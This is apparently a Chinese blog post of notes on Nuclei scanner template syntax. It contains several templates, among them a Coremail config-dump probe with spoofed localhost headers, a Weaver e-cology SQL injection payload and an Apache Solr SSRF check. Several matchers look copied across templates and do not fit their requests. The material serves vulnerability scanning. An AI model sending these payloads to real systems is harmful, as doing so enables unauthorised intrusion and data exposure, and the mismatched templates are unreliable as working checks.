Nuclei 模板文件 记录

 1: severity: info       #定义危险级别   info    medium  critical   high 
2:
{{BaseURL}}       原始读取的URL
  {{Hostname}}       请求头中的Host
3:  
redirects: true #是否 重定向
max-redirects: 3 #最大重定向的深度
4:  
matchers-condition: and #多个条件之间的
5:  negative: true   负匹配器
6:  extractors: regex kval group: 1
7: cookie-reuse: true
id: temple-get

info:
  name: get-info
  author: YanYun
  severity: medium
  tags: dir,email,java

requests:
  - method: GET
    headers:
      X-Client-IP: 127.0.0.1
      X-Remote-IP: 127.0.0.1
      X-Remote-Addr: 127.0.0.1
      X-Forwarded-For: 127.0.0.1
      X-Originating-IP: 127.0.0.1
      
    path:
      - "{{BaseURL}}/mailsms/s?func=ADMIN:appState&dumpConfig=/"
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "len(body)<1024 && status_code==200" 
      
      - type: status
        status:
          - 200
      
      - type: word
        words:
           - '<string name="configHome">/home/coremail</string>'
           - '404'
        condition: and  
        negative: true 
        
      - type: word
        name: php
        words:
          - "X-Powered-By: PHP"
        part: header
id: Coremail-info

info:
  name: Coremail-info
  author: YanYun
  severity: medium
  tags: dir,email,java

requests:
  - method: POST
    headers:
      X-Client-IP: 127.0.0.1
      X-Remote-IP: 127.0.0.1
      X-Remote-Addr: 127.0.0.1
      X-Forwarded-For: 127.0.0.1
      X-Originating-IP: 127.0.0.1
    
    path:
      - "{{BaseURL}}/admin"

    body: 'admin=test'
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "len(body)<1024 && status_code==200" 
      - type: status
        status:
          - 200
      - type: word
        words:
           - '<string name="configHome">/home/coremail</string>'
           - '404'
        condition: and  
        negative: true    
        
      - type: word
        name: php
        words:
          - "X-Powered-By: PHP"
        part: header        
id: oa-cology-sql
info:
  name: oa-cology-sql
  author: Yanyun
  severity: info
  tages: sql,oa,java,dir
requests:  
  - raw:
     - |
        POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: ecology_JSessionId=abc49y8JvMcoqhSkCv02w; testBanCookie=test
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 2236
        Upgrade-Insecure-Requests: 1

        formids=11111111111))) select NULL,value from v$parameter order by (((1
    
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "len(body)<1024 && status_code==200" 
      - type: status
        status:
          - 200
      - type: word
        words:
           - '<string name="configHome">/home/coremail</string>'
           - '404'
        condition: and  
        negative: true  
id: CVE-2021-27905

info:
  name: Apache Solr <= 8.8.1 SSRF
  author: hackergautam
  severity: medium
  tags: cve,cve2021,apache,solr,ssrf

requests:
  - raw:
      - |
        GET /account/login.php  HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close

      - |
        GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://example.com HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close

    extractors:
      - type: regex
        regex:

          - '<input type="hidden" name="846c3d198c2af4004cdc58e6e5f00468d81bdda4" value="(.*?)">'
        name: core
        group: 1
        internal: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 404
          
      - type: word
        words:
          - 'tokenId'

 


posted @ 2021-04-29 18:26  BuXuan  阅读(119)  评论(0编辑  收藏  举报